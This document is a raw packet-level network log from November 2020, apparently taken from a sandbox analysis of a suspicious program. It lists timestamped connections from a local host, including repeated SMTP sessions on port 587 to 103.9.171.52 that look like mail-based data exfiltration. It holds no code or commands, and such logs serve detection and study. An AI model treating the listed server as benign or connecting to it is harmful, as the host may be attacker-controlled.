Nov 27, 2020 14:24:57.172461033 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.172480106 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.172528028 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.173149109 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.173216105 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.173245907 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.173268080 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.173284054 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.173348904 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.173979044 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.174052000 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.174062967 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.174127102 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.174141884 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.174201965 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.174813032 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.174884081 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.174890041 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.174932957 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.174945116 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.174992085 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.175633907 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.175683022 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.175707102 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.175723076 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.175724983 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.175776005 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.176472902 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.176516056 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.176546097 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.176554918 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.176567078 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.176610947 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.177289009 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.177330971 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.177361012 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.177380085 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.253794909 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.282378912 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.282434940 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.282476902 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.282516956 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.282548904 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.282553911 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.282592058 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.282608032 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.282783031 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.282826900 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.282841921 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.282864094 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.282886028 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.282906055 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.282912016 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.282954931 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.282957077 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.282995939 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.283690929 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.283734083 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.283760071 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.283771992 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.283790112 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.283813953 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.283819914 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.283863068 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.283864975 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.283902884 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.284610033 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.284656048 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.284691095 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.284692049 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.284703016 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.284739017 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.284739971 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.284782887 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.284795046 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.284826040 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.562321901 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.562488079 CET	49698	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.562516928 CET	49699	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.562634945 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.562738895 CET	49700	80	192.168.2.3	93.184.220.29
Nov 27, 2020 14:24:57.562772989 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:25:04.583244085 CET	443	49696	104.43.193.48	192.168.2.3
Nov 27, 2020 14:25:04.585982084 CET	49696	443	192.168.2.3	104.43.193.48
Nov 27, 2020 14:25:04.727197886 CET	443	49696	104.43.193.48	192.168.2.3
Nov 27, 2020 14:25:04.727277994 CET	49696	443	192.168.2.3	104.43.193.48
Nov 27, 2020 14:25:20.367546082 CET	443	49678	204.79.197.200	192.168.2.3
Nov 27, 2020 14:25:34.505022049 CET	443	49683	184.24.28.12	192.168.2.3
Nov 27, 2020 14:25:34.505075932 CET	443	49683	184.24.28.12	192.168.2.3
Nov 27, 2020 14:25:34.505194902 CET	49683	443	192.168.2.3	184.24.28.12
Nov 27, 2020 14:25:34.505672932 CET	49683	443	192.168.2.3	184.24.28.12
Nov 27, 2020 14:25:34.505686998 CET	49683	443	192.168.2.3	184.24.28.12
Nov 27, 2020 14:25:34.521852016 CET	443	49683	184.24.28.12	192.168.2.3
Nov 27, 2020 14:25:34.521879911 CET	443	49683	184.24.28.12	192.168.2.3
Nov 27, 2020 14:25:40.273792982 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:40.539572001 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:40.539716959 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:41.367238998 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:41.368335009 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:41.634421110 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:41.634907961 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:42.231693029 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:42.934869051 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:43.755945921 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:43.756514072 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:44.009761095 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:44.021934986 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:44.048384905 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:44.048794031 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:44.314590931 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:44.317465067 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:44.622266054 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:44.657011032 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:44.657308102 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:44.922728062 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:44.922913074 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:44.924808025 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:44.925086021 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:44.925280094 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:44.925600052 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:45.190520048 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:45.190830946 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:45.230295897 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:45.230567932 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:45.451208115 CET	49686	80	192.168.2.3	93.184.220.29
Nov 27, 2020 14:25:45.456279993 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:45.456506014 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:45.467592955 CET	80	49686	93.184.220.29	192.168.2.3
Nov 27, 2020 14:25:45.467746973 CET	49686	80	192.168.2.3	93.184.220.29
Nov 27, 2020 14:25:45.495928049 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:45.496053934 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:45.722193003 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:45.722271919 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:45.722351074 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:45.722393990 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:45.761545897 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:45.761702061 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:45.761881113 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:45.852232933 CET	80	49684	93.184.220.29	192.168.2.3
Nov 27, 2020 14:25:45.852335930 CET	49684	80	192.168.2.3	93.184.220.29
Nov 27, 2020 14:25:45.987999916 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:45.988044977 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:45.988070965 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:45.988095999 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:45.988137007 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:45.988177061 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:45.988208055 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:45.989089012 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:46.027386904 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:46.027435064 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:46.027461052 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:46.027518988 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:46.027542114 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:46.253806114 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:46.253839970 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:46.253865957 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:46.253905058 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:46.253920078 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:46.253936052 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:46.253950119 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:46.253966093 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:46.254009008 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:46.254084110 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:46.254301071 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:46.254348040 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:46.293006897 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:46.293041945 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:46.293133020 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:46.293152094 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:46.293157101 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:46.443972111 CET	49687	443	192.168.2.3	23.210.249.50
Nov 27, 2020 14:25:46.444466114 CET	49688	80	192.168.2.3	93.184.220.29
Nov 27, 2020 14:25:46.519418001 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:46.519483089 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:46.519613981 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:46.519644022 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:46.519661903 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:46.519679070 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:46.519685984 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:46.519696951 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:46.519813061 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:46.519872904 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:46.521550894 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:46.558448076 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:46.558562040 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:46.558571100 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:46.602283001 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:46.602380991 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:46.785036087 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:46.785060883 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:46.785095930 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:46.785363913 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:46.785672903 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:46.786746979 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:46.786983013 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:46.824033022 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:46.824261904 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:46.935436964 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:46.935795069 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:47.050738096 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:47.050766945 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:47.051053047 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:47.051071882 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:47.051435947 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:47.052258015 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:47.052398920 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:47.089766979 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:47.090112925 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:47.201343060 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:47.201564074 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:47.201606989 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:47.316536903 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:47.316571951 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:47.316587925 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:47.316605091 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:47.316862106 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:47.316896915 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:47.316899061 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:47.316992044 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:47.317060947 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:47.317118883 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:47.317656040 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:47.317790031 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:47.317809105 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:47.317895889 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:47.355643988 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:47.355700016 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:47.355956078 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:47.467056036 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:47.467243910 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:47.582495928 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:47.582551956 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:47.582701921 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:47.582858086 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:47.582937956 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:47.583163977 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:47.621437073 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:47.732832909 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:47.848484993 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:47.848522902 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:47.848781109 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:47.853806973 CET	587	49719	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:47.904160023 CET	49719	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:48.477583885 CET	80	49689	93.184.220.29	192.168.2.3
Nov 27, 2020 14:25:48.477865934 CET	49689	80	192.168.2.3	93.184.220.29
Nov 27, 2020 14:25:49.318814993 CET	49724	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:49.581980944 CET	587	49724	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:49.582071066 CET	49724	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:49.862801075 CET	587	49724	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:49.866229057 CET	49724	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:49.999013901 CET	49724	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:50.129899979 CET	587	49724	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:50.130110979 CET	49724	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:50.262506008 CET	587	49724	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:50.263417959 CET	587	49724	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:50.263591051 CET	49724	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:50.263910055 CET	49724	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:52.005382061 CET	49693	443	192.168.2.3	204.79.197.200
Nov 27, 2020 14:25:52.005433083 CET	49692	443	192.168.2.3	204.79.197.200
Nov 27, 2020 14:25:59.541415930 CET	49730	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:25:59.805022955 CET	587	49730	103.9.171.52	192.168.2.3
Nov 27, 2020 14:25:59.805362940 CET	49730	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:00.085405111 CET	587	49730	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:00.085947990 CET	49730	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:00.093203068 CET	49730	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:00.349783897 CET	587	49730	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:00.349931002 CET	49730	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:00.356672049 CET	587	49730	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:00.356777906 CET	49730	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:00.357629061 CET	587	49730	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:00.357763052 CET	49730	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:10.414120913 CET	49739	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:10.677638054 CET	587	49739	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:10.677783966 CET	49739	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:10.958657980 CET	587	49739	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:10.958883047 CET	49739	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:11.000945091 CET	49739	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:11.222681046 CET	587	49739	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:11.222812891 CET	49739	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:11.264421940 CET	587	49739	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:11.264514923 CET	49739	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:11.265189886 CET	587	49739	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:11.265317917 CET	49739	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:18.981313944 CET	49740	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:19.244750023 CET	587	49740	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:19.244993925 CET	49740	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:19.376362085 CET	49740	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:19.524956942 CET	587	49740	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:19.525250912 CET	49740	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:19.639816046 CET	587	49740	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:19.639858961 CET	587	49740	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:19.640065908 CET	49740	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:19.640129089 CET	49740	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:19.640444994 CET	587	49740	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:19.640585899 CET	49740	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:28.449285030 CET	49741	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:28.714771986 CET	587	49741	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:28.715135098 CET	49741	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:28.970594883 CET	49741	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:28.998317957 CET	587	49741	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:28.998491049 CET	49741	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:29.236226082 CET	587	49741	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:29.236356020 CET	49741	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:29.237145901 CET	587	49741	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:29.237438917 CET	49741	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:30.815606117 CET	49742	443	192.168.2.3	174.129.214.20
Nov 27, 2020 14:26:30.918544054 CET	443	49742	174.129.214.20	192.168.2.3
Nov 27, 2020 14:26:30.918651104 CET	49742	443	192.168.2.3	174.129.214.20
Nov 27, 2020 14:26:30.947535992 CET	49742	443	192.168.2.3	174.129.214.20
Nov 27, 2020 14:26:31.050641060 CET	443	49742	174.129.214.20	192.168.2.3
Nov 27, 2020 14:26:31.050801992 CET	443	49742	174.129.214.20	192.168.2.3
Nov 27, 2020 14:26:31.050899982 CET	443	49742	174.129.214.20	192.168.2.3
Nov 27, 2020 14:26:31.050991058 CET	443	49742	174.129.214.20	192.168.2.3
Nov 27, 2020 14:26:31.051043034 CET	49742	443	192.168.2.3	174.129.214.20
Nov 27, 2020 14:26:31.051075935 CET	443	49742	174.129.214.20	192.168.2.3
Nov 27, 2020 14:26:31.051183939 CET	49742	443	192.168.2.3	174.129.214.20
Nov 27, 2020 14:26:31.051835060 CET	443	49742	174.129.214.20	192.168.2.3
Nov 27, 2020 14:26:31.095093966 CET	49742	443	192.168.2.3	174.129.214.20
Nov 27, 2020 14:26:31.112060070 CET	49742	443	192.168.2.3	174.129.214.20
Nov 27, 2020 14:26:31.215202093 CET	443	49742	174.129.214.20	192.168.2.3
Nov 27, 2020 14:26:31.266982079 CET	49742	443	192.168.2.3	174.129.214.20
Nov 27, 2020 14:26:31.312763929 CET	49742	443	192.168.2.3	174.129.214.20
Nov 27, 2020 14:26:31.419272900 CET	443	49742	174.129.214.20	192.168.2.3
Nov 27, 2020 14:26:31.470350981 CET	49742	443	192.168.2.3	174.129.214.20
Nov 27, 2020 14:26:34.142784119 CET	49689	80	192.168.2.3	93.184.220.29
Nov 27, 2020 14:26:34.142848969 CET	49678	443	192.168.2.3	40.90.22.183
Nov 27, 2020 14:26:34.142935991 CET	49679	80	192.168.2.3	8.248.117.254
Nov 27, 2020 14:26:34.159163952 CET	80	49689	93.184.220.29	192.168.2.3
Nov 27, 2020 14:26:34.159274101 CET	49689	80	192.168.2.3	93.184.220.29
Nov 27, 2020 14:26:34.162652969 CET	80	49679	8.248.117.254	192.168.2.3
Nov 27, 2020 14:26:34.162744045 CET	49679	80	192.168.2.3	8.248.117.254
Nov 27, 2020 14:26:34.313051939 CET	443	49678	40.90.22.183	192.168.2.3
Nov 27, 2020 14:26:34.313139915 CET	49678	443	192.168.2.3	40.90.22.183
Nov 27, 2020 14:26:36.816090107 CET	49743	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:37.079070091 CET	587	49743	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:37.082448006 CET	49743	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:37.316030979 CET	49743	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:37.362380981 CET	587	49743	103.9.171.52	192.168.2.3
Nov 27, 2020 14:26:37.366229057 CET	49743	587	192.168.2.3	103.9.171.52
Nov 27, 2020 14:26:37.579276085 CET	587	49743	103.9.171.52	192.168.2.3
